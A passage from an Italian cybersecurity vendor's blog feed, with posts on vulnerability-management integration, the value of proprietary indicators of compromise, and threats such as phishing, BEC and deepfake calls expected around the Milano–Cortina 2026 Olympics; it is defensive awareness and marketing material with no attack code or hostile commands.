&lt;p&gt;I nostri analisti, esperti e pluricertificati, vantanno una esperienza pluriennale con la solzuione Qualys VMDR. Ne conoscono a fondo le funzionalità, le logiche di prioritizzazione e le modalità di integrazione nei processi di sicurezza. Questa esperienza consente di andare oltre la semplice identificazione delle vulnerabilità.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Il SecOps Certego supporta i clienti nella lettura dei risultati, nella contestualizzazione rispetto al profilo di rischio e nella definizione delle priorità di intervento&lt;/strong&gt;. Le vulnerabilità non vengono trattate come un elenco tecnico, ma come elementi da integrare in una strategia strutturata di remediation all’interno dei servizi MDR.&lt;/p&gt;
&lt;p&gt;L’esperienza maturata sul campo permette inoltre di integrare più rapidamente le informazioni nel flusso operativo, accelerando l’allineamento tra esposizione degli asset, attività di Detection e Response e piani di remediation.&lt;/p&gt;
&lt;p&gt;In questo modo, la gestione delle vulnerabilità non è solo tecnologicamente integrata nella piattaforma, ma anche operativamente &lt;strong&gt;guidata da competenze specialistiche&lt;/strong&gt;, generando un valore aggiunto concreto nella riduzione del rischio.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;PanOptikon® come centro di controllo unificato&lt;/h1&gt;
&lt;p&gt;Con l’integrazione nativa di Qualys VMDR, &lt;strong&gt;PanOptikon® rafforza ulteriormente il proprio ruolo di centro di controllo unificato per le attività di Security Operations&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Incident Response, Detection e Vulnerability Management convergono in un unico ambiente operativo, offrendo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;visione centralizzata degli asset esposti&lt;/li&gt;
&lt;li&gt;prioritizzazione basata sul rischio&lt;/li&gt;
&lt;li&gt;gestione coordinata delle attività di remediation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Un unico ecosistema operativo per integrare tecnologia, processi e competenze nella gestione integrata del rischio&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Indicatori di compromissione]]></title><description><![CDATA[Dalla prevenzione al triage: quando la qualità degli IOC fa la differenza]]></description><link>https://www.certego.net/blog/indicatori-di-compromissione-mdr/</link><guid isPermaLink="false">indicatori-di-compromissione-mdr</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 18 Feb 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;C’è una domanda che ogni CISO dovrebbe farsi: le mie tecnologie stanno bloccando tutto quello che potrebbero bloccare?&lt;/p&gt;
&lt;p&gt;Firewall, proxy, DNS filtering, EDR, SIEM: funzionano.
Ma la loro efficacia dipende da una &quot;cosa semplice&quot; — la qualità degli indicatori che li alimentano.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Il problema dei feed “generici”&lt;/h1&gt;
&lt;p&gt;I feed pubblici spesso privilegiano la quantità:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;migliaia di IP&lt;/li&gt;
&lt;li&gt;domini segnalati senza contesto&lt;/li&gt;
&lt;li&gt;indicatori vecchi che rimangono nelle liste troppo a lungo&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Il risultato?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Aumento dei falsi positivi&lt;/li&gt;
&lt;li&gt;Rumore operativo&lt;/li&gt;
&lt;li&gt;Blocklist poco aggiornate&lt;/li&gt;
&lt;li&gt;Analisti che perdono tempo a verificare segnali poco rilevantiù&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;La Threat Intelligence non dovrebbe aumentare il carico operativo. Dovrebbe ridurlo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;IOC proprietari: cosa cambia davvero&lt;/h1&gt;
&lt;p&gt;Un IOC diventa strategico quando non è solo “raccolto”, ma:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;osservato su infrastrutture reali&lt;/li&gt;
&lt;li&gt;validato e classificato&lt;/li&gt;
&lt;li&gt;contestualizzato&lt;/li&gt;
&lt;li&gt;gestito nel tempo (già, perché gli IOC possono decadere col tempo)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;E soprattutto quando è &lt;strong&gt;rilevante per il contesto geografico e settoriale in cui opera l’azienda&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Un’intelligence focalizzata sul panorama italiano, costruita su visibilità concreta e sensori distribuiti, produce indicatori diversi rispetto ai feed globali di carattere generale. Più mirati. Più utili&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Fase 1: Prevenzione — quando l’IOC diventa un moltiplicatore&lt;/h1&gt;
&lt;p&gt;Il primo impatto è immediato.
Gli IOC proprietari possono essere integrati nei sistemi esistenti:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;firewall&lt;/li&gt;
&lt;li&gt;IDS/IPS&lt;/li&gt;
&lt;li&gt;DNS filtering&lt;/li&gt;
&lt;li&gt;proxy&lt;/li&gt;
&lt;li&gt;SIEM&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Non serve cambiare architettura. Serve migliorare ciò che alimenta i controlli.
La differenza sta in tre fattori chiave:&lt;/p&gt;
&lt;h3&gt;Tempestività&lt;/h3&gt;
&lt;p&gt;Indicatori &lt;strong&gt;aggiornati in tempo reale intercettano minacce attive&lt;/strong&gt;, non campagne concluse mesi prima.&lt;/p&gt;
&lt;h3&gt;Precisione&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Verifica continua e controllo qualità&lt;/strong&gt; riducono il rumore e i falsi positivi.&lt;/p&gt;
&lt;h3&gt;Decadimento controllato&lt;/h3&gt;
&lt;p&gt;IP e domini non rimangono in blacklist per sempre. Gli indicatori &lt;strong&gt;vengono mantenuti solo finché sono realmente pericolosi&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Il risultato è concreto: &lt;strong&gt;più blocchi rilevanti, meno rumore&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Caso reale Certego #1 – Settore Finance&lt;/h1&gt;
&lt;p&gt;Un gruppo enterprise del settore finanziario, cliente MDR Certego, ha integrato i nostri IOC proprietari nel firewall perimetrale già in uso, senza modificare l’architettura esistente.&lt;/p&gt;
&lt;p&gt;Nei primi 7 giorni di utilizzo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;+10% di incremento dei blocchi firewall grazie agli IOC di Certego&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;20 milioni di tentativi di connessione malevola bloccati da indirizzi IP classificati come malevoli da parte di Certego&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/0a482d869d7903cd5312ca4733d38219/a878e/Esempio%20IOC%20Finance%20Certego%20MDR.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 34.895833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAC4jAAAuIwF4pT92AAABVUlEQVR42kWQ30oCQRSHfYPoCSIK6aKobrrpXXoApV6noiAjSkPJLrsxJXoACUFFUHe33F3HWXf+7szsuNusWf34OPxuvsPh5NI0lXoBmYJcCaXjWC+SxCCl0lpzzpNYxUoqpZjIZqLjNDEsjJjLZKlYFPFIRCJDSsEiEWKslZwS/m6HHqKpiopv7nUH9gC5/ACAyZWcbeXsL3QJYSzVajzn+YpVePOadrhdtg5r9vGzs1Ya3vbxShZCGDfiTHBumimcM0qpkYeQ7letvap9VHd2l+Wg5mzcj2766P/sANMZpi6ibkgDwuaEQcykkgOA8+VRvjLeKo83H8y0dh6t9dLwqvsrCxXXB/Cu45+3vYu2V+v6Tz1Q7U7bLoZMFltfhtOmU2jYxVfnrPV58jJq2GQlmwRCzxHBJoQECMMQzUJkLjJvn8Bw4gPguVODOwG+RzH6sb4BI4Ju/SLCzx4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/0a482d869d7903cd5312ca4733d38219/71c1d/Esempio%20IOC%20Finance%20Certego%20MDR.png&quot; srcset=&quot;/website/static/0a482d869d7903cd5312ca4733d38219/804b2/Esempio%20IOC%20Finance%20Certego%20MDR.png 384w,
/website/static/0a482d869d7903cd5312ca4733d38219/e5715/Esempio%20IOC%20Finance%20Certego%20MDR.png 768w,
/website/static/0a482d869d7903cd5312ca4733d38219/71c1d/Esempio%20IOC%20Finance%20Certego%20MDR.png 1536w,
/website/static/0a482d869d7903cd5312ca4733d38219/a878e/Esempio%20IOC%20Finance%20Certego%20MDR.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Non si tratta di nuove policy più restrittive. Non è stato sostituito il firewall. È stato semplicemente migliorato il feed di intelligence che lo alimentava.&lt;/p&gt;
&lt;p&gt;Quel +10% significa una cosa precisa: &lt;strong&gt;traffico malevolo che prima passava inosservato e che ora viene fermato prima di generare alert interni o tentativi di compromissione&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Nel settore Finance, dove l’esposizione verso campagne phishing, C2 e infrastrutture fraudolente è costante, questo si traduce in riduzione preventiva della superficie di attacco.&lt;/p&gt;
&lt;h1&gt;Caso reale Certego #2 – Settore Manufacturing&lt;/h1&gt;
&lt;p&gt;In un’azienda industriale con forte esposizione OT e vincoli di continuità produttiva, abbiamo applicato lo stesso approccio: integrazione degli IOC proprietari Certego sui controlli perimetrali già presenti.&lt;/p&gt;
&lt;p&gt;Risultato nella prima settimana:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;+21% di incremento dei blocchi firewall grazie agli IOC di Certeg&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;+12 milioni di tentativi di connessione malevola bloccati da indirizzi IP classificati come malevoli da parte di Certego&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/beedce4ee7179c8e07b5523abb3d70ef/a878e/Esempio%20IOC%20Manufacturing%20Certego%20MDR.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 34.895833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAC4jAAAuIwF4pT92AAABWElEQVR42kWQu0oDURCGLX0MQRCxUXwGK3sLO5/AgBAT1DxBQKwEGxsvBNOFFCIqJLuiggoBGwmYxHUv2WQT9+yZc92T9awuZPgZfmbmG4aZSZJExCogYgiCCillnEopzrlSCoAwxgTnQnCdGc8ijmMNzqSwEEAIodOICA1DpOuMUgKAgSAMowgkIzwtgG5lsN6EMI4wIAA9pE30Z/QZQFmu4W7e2BvXdq7phphYY6x53ZrCSpBE0qkEnTCSTGIP0dVqb6nS1Vq+6q3XrbWatXVr1ztRBmPKyy9e+bV/3PIP3/zT92H1I6i1g94PHSBYqXQWLjqLl53588+5s9TPnrSPWuMMBi5Lz/6O4RRMJ286RdMpPbp5w35yIink/oO7azh7xnehYRWb1oFpb991779QBqc/U0o/Q9IopliSSIAWUpJPkmQwRt4gGPle4HvDvjvy+4DCf+oX9gZyMLbNzCgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/beedce4ee7179c8e07b5523abb3d70ef/71c1d/Esempio%20IOC%20Manufacturing%20Certego%20MDR.png&quot; srcset=&quot;/website/static/beedce4ee7179c8e07b5523abb3d70ef/804b2/Esempio%20IOC%20Manufacturing%20Certego%20MDR.png 384w,
/website/static/beedce4ee7179c8e07b5523abb3d70ef/e5715/Esempio%20IOC%20Manufacturing%20Certego%20MDR.png 768w,
/website/static/beedce4ee7179c8e07b5523abb3d70ef/71c1d/Esempio%20IOC%20Manufacturing%20Certego%20MDR.png 1536w,
/website/static/beedce4ee7179c8e07b5523abb3d70ef/a878e/Esempio%20IOC%20Manufacturing%20Certego%20MDR.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Nel manufacturing, ogni connessione malevola in meno non è solo un numero.&lt;/p&gt;
&lt;p&gt;Significa:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;meno traffico sospetto che entra in rete&lt;/li&gt;
&lt;li&gt;meno eventi che arrivano al SOC&lt;/li&gt;
&lt;li&gt;meno probabilità che un’infrastruttura di produzione venga coinvolta&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Qui la Threat Intelligence non è solo un report da leggere. È &lt;strong&gt;riduzione misurabile del rischio operativo&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Fase 2: Analisi — quando l’IOC accelera l’incident response&lt;/h1&gt;
&lt;p&gt;Gli indicatori non servono solo a bloccare. Servono a capire.&lt;/p&gt;
&lt;p&gt;In fase di analisi, un IOC efficace deve rispondere subito a tre domande:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Che tipo di minaccia è?&lt;/li&gt;
&lt;li&gt;È collegata a una campagna nota?&lt;/li&gt;
&lt;li&gt;Quanto è attiva e diffusa?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Un indicatore contestualizzato — arricchito con informazioni su:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;famiglia malware&lt;/li&gt;
&lt;li&gt;tecniche utilizzate&lt;/li&gt;
&lt;li&gt;fase della kill chain&lt;/li&gt;
&lt;li&gt;prima e ultima osservazione&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;permette agli analisti di ridurre drasticamente il tempo di triage.&lt;/p&gt;
&lt;p&gt;Non è più esclusivamente un match su una lista. È un oggetto con significato operativo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Performance del SOC&lt;/h1&gt;
&lt;p&gt;Spesso si misura l’MDR in termini di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;MTTD - Mean Time To Detect&lt;/li&gt;
&lt;li&gt;MTTR - Mean Time To Respond&lt;/li&gt;
&lt;li&gt;numero di incidenti gestiti&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Meno frequentemente si misura l’effetto della qualità dell’intelligence su:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;volume di alert evitati&lt;/li&gt;
&lt;li&gt;tempo medio di analisi&lt;/li&gt;
&lt;li&gt;riduzione del rumore perimetrale&lt;/li&gt;
&lt;li&gt;carico sugli analisti&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;IOC proprietari ben gestiti migliorano entrambe le fasi:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Prevenzione&lt;/strong&gt;: più blocchi mirati, meno traffico malevolo interno&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Analisi&lt;/strong&gt;: triage più rapido, decisioni più informate&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SOC&lt;/strong&gt;: meno rumore, più focus sugli eventi critici
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Vantaggio competitivo&lt;/h1&gt;
&lt;p&gt;Un data feed non è una lista. È un processo continuo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;raccolta&lt;/li&gt;
&lt;li&gt;validazione&lt;/li&gt;
&lt;li&gt;correlazione&lt;/li&gt;
&lt;li&gt;aggiornamento&lt;/li&gt;
&lt;li&gt;integrazione operativa&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quando questo processo è progettato per essere vicino al contesto reale delle aziende che protegge, l’effetto non è teorico.
Si traduce in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;percentuali di blocco misurabili&lt;/li&gt;
&lt;li&gt;milioni di connessioni malevole intercettate&lt;/li&gt;
&lt;li&gt;tempi di risposta ridotti&lt;/li&gt;
&lt;li&gt;migliore utilizzo delle risorse interne&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;E in un’epoca in cui le superfici di attacco crescono più velocemente dei team di sicurezza, migliorare le performance delle difese esistenti è una leva fondamentale per aumentare il livello di protezione complessivo.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Giochi Olimpici Invernali]]></title><description><![CDATA[Milano–Cortina 2026: anche i threat actor vogliono l’oro]]></description><link>https://www.certego.net/blog/giochi-olimpici-invernali-milano-cortina-2026-cybersecurity-threat-actor/</link><guid isPermaLink="false">giochi-olimpici-invernali-milano-cortina-2026-cybersecurity-threat-actor</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 29 Jan 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Milano–Cortina 2026 non è “solo” un evento sportivo. È una macchina temporanea che si accende, gira a regime altissimo per poche settimane e poi si spegne. In mezzo, però, succedono tante cose: persone che arrivano, badge che si attivano, account che si creano, fornitori che entrano, pagamenti che scorrono, servizi che devono funzionare sempre.&lt;/p&gt;
&lt;p&gt;E quando il mondo guarda, non guardano soltanto gli appassionati.&lt;/p&gt;
&lt;p&gt;Non è un messaggio allarmistico, né una profezia nera: è un ragionamento probabilistico.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Più visibilità + più complessità + più urgenza = più opportunità per chi vive di frodi, estorsioni, sabotaggi dimostrativi o attività di intelligence&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In altre parole: se i Giochi sono una vetrina globale, è normale che qualcuno provi a salirci sopra—anche solo per pochi minuti—per far rumore.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Perché i grandi eventi “moltiplicano” il rischio&lt;/h1&gt;
&lt;p&gt;Ci sono tre ingredienti che, insieme, rendono qualsiasi mega-evento un magnete:&lt;/p&gt;
&lt;h3&gt;1) Il rumore di fondo è altissimo&lt;/h3&gt;
&lt;p&gt;In periodi normali, un’email strana o una richiesta “fuori procedura” risalta. Durante un evento globale, invece, arrivano davvero mille eccezioni: nuovi contatti, nuove urgenze, nuovi flussi, nuovi strumenti. Lo scenario perfetto per chi punta sulla confusione.&lt;/p&gt;
&lt;h3&gt;2) L’ecosistema è enorme (e non uniforme)&lt;/h3&gt;
&lt;p&gt;Non esiste “un unico perimetro”: ci sono organizzatori, venue, sponsor, media, hospitality, logistica, trasporti, service desk, IT di terze parti, consulenti, stagionali, volontari… la sicurezza non è mai identica per tutti. E gli attaccanti, storicamente, preferiscono gli anelli più deboli.&lt;/p&gt;
&lt;h3&gt;3) L’impatto reputazionale amplifica tutto&lt;/h3&gt;
&lt;p&gt;Anche un incidente relativamente “contenuto” può diventare enorme se si traduce in disservizi pubblici, code ai tornelli, biglietti bloccati, comunicazioni confuse, pagamenti non disponibili. Nei grandi eventi spesso la pressione non è tecnica: è mediatica.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;La “pista lunga” degli attacchi: non succede tutto durante i Giochi&lt;/h1&gt;
&lt;p&gt;Uno dei fraintendimenti più comuni è immaginare l’attacco “il giorno della cerimonia”. In realtà, la finestra interessante è più ampia:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Prima: vendita biglietti, prenotazioni, accrediti, assunzioni temporanee, onboarding fornitori, nuovi siti e landing page “a tema”, campagne social;&lt;/li&gt;
&lt;li&gt;Durante: picchi di traffico, assistenza al pubblico, continuità operativa, turnover, escalation rapide, più pressione sugli operatori;&lt;/li&gt;
&lt;li&gt;Dopo: rimborsi, contestazioni, fatture, report, dismissione di ambienti temporanei (che spesso resta incompleta).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;È qui che si annidano i problemi più banali e più frequenti: account dimenticati, DNS lasciati appesi, portali temporanei rimasti online, credenziali riutilizzate, procedure bypassate “solo per oggi”.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-come-strumento-decisionale-per-il-ciso/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1494px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 49.739583333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAABYlAAAWJQFJUiTwAAACHUlEQVR42k2RyWsTURjA5w9QPAhF6EER9aCngkUPVSl4Vw+iR8G7F8GDIBViIWlQUYyosUU8KDTGJCYmnZTGZmuamU6WyTJrZnlrJrFFULQXwZdYUPjx4H3v+/Etj1N1K5Lk174UYvFkrdFC2HNc7ALyFwdQxO62bcP+OPLvicEZplPZFDXNzOeLqmoC1Hdc5owYybBPLXNXKe702pBFoPe/z/VcwnfIhoazCi0qmCJCEKWIQrhXGbvuD1PaNYTv6ibUFYg9F9I9WbNxuGJFa+7bqhWR7BUZZFsg3XRlEyE4lh37J1J/Dx1YWy/wqZogGprBRgGQcpZLBBVKOtzSkcjQUFVDFRVpNgEAIzJsiGJ26ZEcXywuh6OLIZGP/RrCba+vaD0OALIlSIV8qdNWGEpXbbe6zYbcVXTWGMIDud58P3+bfzaXe/O4ml6OLz2vr32Ivfa/Cj3hbAdJ9Raj1mjXmx1msTO3XpLbKkSjDTsuKifeCZlIPpN4Gbx37dLFm1dmLkwfDywEOABJ3/vqDba9wQ4hA5YNIdsWBWNGxemwXinfunH18uzU9Zmjs+dOT505e/DIsbu+ANezwOdM7lNqNRpPV4U6QJ5qYcPBZs81TIbDWmP/9/ThwvnpUydPHJ6YnNw/cYjbd+DOnI9jSR8TK4kkvxxNlsoiwF7XwszXDVtj6PZIhtQbftuoSqEXYZ8/+MAfvD8fSGVW/wBarNHMQyaPDQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/1e329b503bfd8cdba163539a23664512/7db30/mdr%20ciso%20certego%20cybersecurity.png&quot; srcset=&quot;/website/static/1e329b503bfd8cdba163539a23664512/804b2/mdr%20ciso%20certego%20cybersecurity.png 384w,
/website/static/1e329b503bfd8cdba163539a23664512/e5715/mdr%20ciso%20certego%20cybersecurity.png 768w,
/website/static/1e329b503bfd8cdba163539a23664512/7db30/mdr%20ciso%20certego%20cybersecurity.png 1494w&quot; sizes=&quot;(max-width: 1494px) 100vw, 1494px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
    &lt;br&gt;
&lt;br&gt;
&lt;h1&gt;Chi potrebbe provarci. Tre profili, un’unica regola: opportunismo&lt;/h1&gt;
&lt;p&gt;Semplificando, intorno ai grandi eventi tendono a muoversi tre “famiglie” di minacce. Le tecniche si sovrappongono, le motivazioni no.&lt;/p&gt;
&lt;h3&gt;Criminalità orientata al profitto&lt;/h3&gt;
&lt;p&gt;È la parte più “pratica” e spesso la più rumorosa: vuole monetizzare.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;truffe sui biglietti e sull’hospitality&lt;/li&gt;
&lt;li&gt;phishing e furto credenziali (anche per rivendere accessi)&lt;/li&gt;
&lt;li&gt;frodi su pagamenti e fatture&lt;/li&gt;
&lt;li&gt;estorsioni e ransomware (spesso con minaccia di pubblicazione dati)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Qui la parola chiave è scalabilità: basta che “ci caschi” una piccola percentuale, e l’operazione funziona.&lt;/p&gt;
&lt;h3&gt;Attori orientati all’intelligence&lt;/h3&gt;
&lt;p&gt;Più pazienti, più selettivi: cercano accesso, informazioni, posizionamento.
I grandi eventi sono interessanti perché concentrano persone di rilievo, comunicazioni sensibili e infrastrutture condivise in un contesto ad alta densità.&lt;/p&gt;
&lt;p&gt;Non serve immaginare scenari hollywoodiani: spesso l’obiettivo è più semplice (e più realistico): acquisire visibilità su email, documenti, chat, reti o dispositivi di figure chiave e dei loro staff.&lt;/p&gt;
&lt;h3&gt;Gruppi dimostrativi e sabotaggio&lt;/h3&gt;
&lt;p&gt;Qui il valore è l’eco: far parlare di sé, sostenere una causa, creare pressione.
Gli strumenti sono spesso “semplici” (defacement, DDoS, takeover di canali social, leak mirati), ma l’effetto mediatico può essere grande.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Le tecniche che funzionano perché… funzionano sugli esseri umani&lt;/h1&gt;
&lt;p&gt;Se c’è una lezione costante nella sicurezza, è questa: durante i picchi operativi, la componente umana diventa il vero punto di contatto.&lt;/p&gt;
&lt;h3&gt;Impersonificazione e BEC: la frode che si traveste da lavoro&lt;/h3&gt;
&lt;p&gt;Non è “l’email con l’italiano sgangherato”. Oggi l’attacco credibile è quello che assomiglia al lavoro vero:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“Serve approvare questa variazione IBAN entro oggi”&lt;/li&gt;
&lt;li&gt;“Il fornitore ha cambiato dominio, usa questa nuova mail”&lt;/li&gt;
&lt;li&gt;“Sono in riunione, fai tu e poi mi aggiorni”&lt;/li&gt;
&lt;li&gt;“Blocco urgente: conferma l’accesso o perdi la prenotazione”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;La differenza la fanno due cose: contesto e urgenza.&lt;/p&gt;
&lt;h3&gt;QR code, app finte e siti clone: la truffa “da turista”&lt;/h3&gt;
&lt;p&gt;Non è “l’email con l’italiano sgangherato”. Oggi l’attacco credibile è quello che assomiglia al lavoro vero:&lt;/p&gt;
&lt;p&gt;Quando arrivano persone da tutto il mondo, aumentano anche le truffe a bersaglio largo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;QR code “pratici” che portano a pagine malevole&lt;/li&gt;
&lt;li&gt;app non ufficiali&lt;/li&gt;
&lt;li&gt;annunci sponsorizzati che imitano portali di ticketing o prenotazione&lt;/li&gt;
&lt;li&gt;finti supporti clienti via chat/social&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;È la versione digitale del bagarino: cambia il mezzo, non la logica.&lt;/p&gt;
&lt;h3&gt;Deepfake vocali e “high touch”: quando l’attacco passa dal telefono&lt;/h3&gt;
&lt;p&gt;Sempre più spesso l’attaccante non si limita a scrivere: chiama.
Prende di mira help desk e service desk perché sono la scorciatoia perfetta: reset password, bypass MFA, nuove registrazioni di device, “eccezioni” autorizzate al volo.&lt;/p&gt;
&lt;p&gt;E con audio sintetico e voce “simile”, la pressione psicologica aumenta: sembra tutto più reale, più urgente, più inevitabile.&lt;/p&gt;
&lt;h3&gt;“Fai da solo e risolvi”: l’ingegneria sociale mascherata da assistenza&lt;/h3&gt;
&lt;p&gt;Sempre più spesso l’attaccante non si limita a scrivere: chiama.
Un’altra dinamica moderna: convincere l’utente a “risolvere” un problema eseguendo azioni che in realtà aprono la porta (installare, abilitare macro, lanciare comandi, concedere permessi, autenticarsi su pagine fasulle).
Non è tecnologia avanzata: è manualistica invertita.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Le aree dove un disservizio fa più male&lt;/h1&gt;
&lt;p&gt;In un evento globale, il tema non è solo “furto dati”. Spesso è la continuità:
Alcuni esempi (senza fare terrorismo, solo pragmatismo):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;accessi e ticketing: code, validazioni bloccate, customer care in tilt&lt;/li&gt;
&lt;li&gt;pagamenti: POS, ricariche, servizi cashless, frodi e chargeback&lt;/li&gt;
&lt;li&gt;hospitality e trasporti: prenotazioni, check-in, cambi orari, logistica&lt;/li&gt;
